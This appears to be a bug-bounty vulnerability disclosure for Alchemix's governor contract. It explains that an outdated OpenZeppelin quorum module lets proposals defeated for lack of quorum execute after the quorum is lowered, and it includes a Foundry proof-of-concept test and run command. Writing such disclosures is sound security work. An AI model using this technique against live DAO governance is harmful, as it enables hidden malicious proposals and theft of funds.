Manipulation of governance voting result deviating from voted outcome and resulting in a direct change from intended effect of original results
The AlchemixGovernor contract inherits the L2GovernorVotesQuorumFraction contract, which is based on an outdated version of OpenZeppelin's GovernorVotesQuorumFraction contract that has a known vulnerability.
This vulnerability allows past proposals to become executable if they were defeated only due to a lack of quorum, and the number of votes they received meets the new quorum requirement.
Vulnerability Details
The AlchemixGovernor contract inherits the L2GovernorVotesQuorumFraction contract, a modified version of OpenZeppelin's GovernorVotesQuorumFraction contract at version v4.5.0. However, this version has a known vulnerability, patched in v4.7.2.
As a result, the AlchemixGovernor contract is affected by the same vulnerability: when a proposal is passed to lower the quorum requirement, past proposals may become executable if they were defeated only due to a lack of quorum, and the number of votes they received meets the new quorum requirement.
Please see the PoC for a concrete scenario of this vulnerability.
Impact Details
An under-quorum proposal should be unable to execute after the vote period.
However, when a proposal is passed to lower the quorum requirement, past proposals become executable if they were defeated only due to a lack of quorum, and the number of votes they received meets the new quorum requirement.
A malicious user could propose a malicious proposal and vote for it. Since it's below the quorum, it may go unnoticed by the DAO. Later, they can propose a proposal to lower the quorum for other valid reasons. If the proposal is executed, their hidden malicious proposal may become executable, potentially causing monetary and reputational harm to the project.
// ./test/PoC.t.sol// SPDX-License-Identifier: Unlicensepragmasolidity ^0.8.0;import"forge-std/Test.sol";import"../src/test/BaseTest.sol";contractPoCisBaseTest {functionsetUp() public {setupContracts(block.timestamp);// Create veALCX for admincreateVeAlcx(admin, TOKEN_100K, MAXTIME,false);// Create veALCX for 0xbeefcreateVeAlcx(beef, TOKEN_1 *10_000, MAXTIME,false);// Can't propose and vote in the same block as a veALCX is created hevm.warp(block.timestamp +1); }functiontest_PastDefeatedProposalCanPassAfterQuorumDecrease() public {assertFalse(voter.isWhitelisted(usdc));// craft a proposal to make voter whitelist usdc (address[] memory t,uint256[] memory v,bytes[] memory c,stringmemory d) =craftTestProposal();// propose hevm.startPrank(admin);uint256 pid = governor.propose(t, v, c, d, MAINNET); hevm.warp(block.timestamp + governor.votingDelay() +1); // delay hevm.stopPrank();// vote hevm.startPrank(beef); governor.castVote(pid,1); hevm.warp(block.timestamp + governor.votingPeriod() +1); // voting period hevm.warp(block.timestamp + timelockExecutor.executionDelay() +1); // execution delay hevm.stopPrank();uint256 votingPower = veALCX.getVotes(beef);uint256 quorum = governor.quorum(block.timestamp);assertGt(quorum, votingPower,"quorum should be greater than voting power");// execute - fail due to lack of quorum hevm.expectRevert(abi.encodePacked("Governor: proposal not successful")); governor.execute(t, v, c,keccak256(bytes(d)), MAINNET);// assume the DAO decides to decrease the QuorumNumeratorupdateQuorumNumerator(50);// As a result, a a past defeated proposal due to lack of quorum now meets the new quorum requirement votingPower = veALCX.getVotes(beef); quorum = governor.quorum(block.timestamp);assertLt(quorum, votingPower,"quorum should be less than voting power");// now the past defeated proposal can be executed governor.execute(t, v, c,keccak256(bytes(d)), MAINNET);assertTrue(voter.isWhitelisted(usdc)); }functioncraftTestProposal()internalviewreturns (address[] memory targets,uint256[] memory values,bytes[] memory calldatas,stringmemory description) { targets =newaddress[](1); targets[0] =address(voter); values =newuint256[](1); values[0] =0; calldatas =newbytes[](1); calldatas[0] = abi.encodeWithSelector(voter.whitelist.selector, usdc); description ="Whitelist USDC"; }functionupdateQuorumNumerator(uint256 newQuorumNumerator) internal {address[] memory targets =newaddress[](1); targets[0] =address(governor);uint256[] memory values =newuint256[](1); values[0] =0;bytes[] memory calldatas =newbytes[](1); calldatas[0] = abi.encodeWithSelector(governor.updateQuorumNumerator.selector, newQuorumNumerator);stringmemory description ="Update QuorumNumerator"; hevm.startPrank(admin);uint256 pid = governor.propose(targets, values, calldatas, description, MAINNET); hevm.warp(block.timestamp + governor.votingDelay() +1); // delay governor.castVote(pid,1); hevm.warp(block.timestamp + governor.votingPeriod() +1); // voting period hevm.warp(block.timestamp + timelockExecutor.executionDelay() +1); // execution delay governor.execute(targets, values, calldatas,keccak256(bytes(description)), MAINNET); hevm.stopPrank(); }}
This PoC inherits the BaseTest contract for its setupContracts() and createVeAlcx() functionalities.
The test_PastDefeatedProposalCanPassAfterQuorumDecrease() test case demonstrates the following scenario:
An admin proposes a proposal to whitelist USDC in the Voter contract.
The user (beef) votes in favor of this proposal.
After the voting period, the proposal cannot be executed since the quorum is not reached.
However, if the DAO later decides to decrease the quorum requirement, the previously defeated proposal can now pass and be executed.
Run the PoC using the following command:
forge test --mt test_PastDefeatedProposalCanPassAfterQuorumDecrease --fork-url $URL --fork-block-number=17133822